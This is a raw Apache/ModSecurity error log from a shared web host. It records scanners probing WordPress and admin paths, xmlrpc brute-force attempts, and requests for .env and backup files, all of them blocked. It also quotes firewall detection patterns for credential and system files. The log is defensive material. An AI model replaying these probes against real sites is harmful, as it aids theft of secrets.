[Tue May 26 13:03:37.003687 2026] [security2:error] [pid 470766:tid 471018] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0OjO_W1DqEcFHQ74NwAAAHo"]
[Tue May 26 13:03:37.105744 2026] [security2:error] [pid 470766:tid 470908] [client 74.7.230.53:44586] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.premium.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahVM0ejO_W1DqEcFHQ74UwAADCg"]
[Tue May 26 13:03:37.272832 2026] [security2:error] [pid 470766:tid 470957] [client 20.104.227.76:3039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.drumstonemedia.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVM0ejO_W1DqEcFHQ74XgAAAD0"]
[Tue May 26 13:03:38.727557 2026] [security2:error] [pid 470766:tid 470974] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74iwAAAE4"]
[Tue May 26 13:03:38.782800 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-headre.php"] [unique_id "ahVM0ujO_W1DqEcFHQ74ogAAAD8"]
[Tue May 26 13:03:40.457077 2026] [security2:error] [pid 470766:tid 470970] [client 4.201.75.230:5545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-links-opml.php"] [unique_id "ahVM1OjO_W1DqEcFHQ746QAAAEo"]
[Tue May 26 13:03:41.939950 2026] [security2:error] [pid 470766:tid 471013] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1ejO_W1DqEcFHQ75IAAAAHU"]
[Tue May 26 13:03:42.694640 2026] [security2:error] [pid 470766:tid 470973] [client 4.201.75.230:5521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-load.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75UwAAAE0"]
[Tue May 26 13:03:43.098459 2026] [security2:error] [pid 470766:tid 470873] [remote 88.198.216.95:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.216.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVM1ujO_W1DqEcFHQ75YAAABWo"]
[Tue May 26 13:03:43.588071 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:43.588260 2026] [security2:error] [pid 470766:tid 470975] [client 157.20.138.61:62796] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75fQAAAE8"]
[Tue May 26 13:03:44.121803 2026] [security2:error] [pid 470766:tid 471006] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM1-jO_W1DqEcFHQ75gwAAAG4"]
[Tue May 26 13:03:44.471927 2026] [ssl:error] [pid 470766:tid 470985] [client 98.84.1.175:43458] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname plenitudotonal.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:03:46.385964 2026] [security2:error] [pid 470766:tid 470919] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM2ejO_W1DqEcFHQ759QAAABc"]
[Tue May 26 13:03:47.232747 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-mail.php"] [unique_id "ahVM2-jO_W1DqEcFHQ76NAAAAFY"]
[Tue May 26 13:03:48.790268 2026] [security2:error] [pid 470766:tid 470997] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3OjO_W1DqEcFHQ76gQAAAGU"]
[Tue May 26 13:03:49.510570 2026] [security2:error] [pid 470766:tid 470964] [client 4.201.75.230:5507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-settings.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76wQAAAEQ"]
[Tue May 26 13:03:49.768933 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.132.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:49.769118 2026] [security2:error] [pid 470766:tid 470955] [client 104.194.132.199:57402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ejO_W1DqEcFHQ76yAAAADs"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:50.508516 2026] [security2:error] [pid 470766:tid 470903] [client 104.194.132.199:57441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVM3ujO_W1DqEcFHQ766QAAAAc"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:03:50.513777 2026] [security2:error] [pid 470766:tid 470986] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ761gAAAFo"]
[Tue May 26 13:03:50.531778 2026] [security2:error] [pid 470766:tid 470769] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/administrator/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ767wAADgI"]
[Tue May 26 13:03:51.130098 2026] [security2:error] [pid 470766:tid 470898] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-signup.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77HAAAAAI"]
[Tue May 26 13:03:51.420275 2026] [security2:error] [pid 470766:tid 470851] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/admin.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77KQAAQ1Q"]
[Tue May 26 13:03:52.335019 2026] [cgid:error] [pid 470766:tid 471015] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/admin.cgi: script not found or unable to stat
[Tue May 26 13:03:53.316631 2026] [security2:error] [pid 470766:tid 470905] [client 14.180.135.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4OjO_W1DqEcFHQ77agAAAAk"]
[Tue May 26 13:03:53.628547 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77fgAAAF8"]
[Tue May 26 13:03:53.703272 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-start.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77lwAAAD8"]
[Tue May 26 13:03:54.012948 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.013057 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.727598 2026] [security2:error] [pid 470766:tid 471006] [client 4.201.75.230:5272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmlrpc_old.php"] [unique_id "ahVM4ujO_W1DqEcFHQ770QAAAG4"]
[Tue May 26 13:03:55.079774 2026] [autoindex:error] [pid 470766:tid 470923] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/control/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:55.553557 2026] [security2:error] [pid 470766:tid 470943] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4-jO_W1DqEcFHQ777QAAAC8"]
[Tue May 26 13:03:57.778031 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XAAAAD8"]
[Tue May 26 13:03:57.778462 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XQAAAG8"]
[Tue May 26 13:03:57.780570 2026] [security2:error] [pid 470766:tid 470835] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78eQAAAEQ"]
[Tue May 26 13:03:57.781192 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "vcresco.com"] [uri "/*update.cgi*"] [unique_id "ahVM5ejO_W1DqEcFHQ78fQAAAH0"]
[Tue May 26 13:03:57.782052 2026] [security2:error] [pid 470766:tid 470806] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78fwAAACc"]
[Tue May 26 13:03:57.782201 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78gQAAAH0"]
[Tue May 26 13:03:57.798156 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78VwAAAAk"]
[Tue May 26 13:03:57.801340 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78UgAAABA"]
[Tue May 26 13:03:57.804891 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78WQAAAGQ"]
[Tue May 26 13:03:57.814567 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78ewAAAHs"]
[Tue May 26 13:03:57.823359 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iAAAADg"]
[Tue May 26 13:03:57.825569 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78igAAAC0"]
[Tue May 26 13:03:57.825708 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iwAAAG0"]
[Tue May 26 13:03:58.203087 2026] [security2:error] [pid 470766:tid 470861] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78qQAAAV4"]
[Tue May 26 13:03:58.203207 2026] [security2:error] [pid 470766:tid 470859] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78pgAAAVw"]
[Tue May 26 13:03:58.206313 2026] [security2:error] [pid 470766:tid 470769] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.bak"] [unique_id "ahVM5ujO_W1DqEcFHQ78rgAAAQI"]
[Tue May 26 13:03:58.206912 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.backup"] [unique_id "ahVM5ujO_W1DqEcFHQ78rQAAAUw"]
[Tue May 26 13:03:58.231982 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78pwAAAVE"]
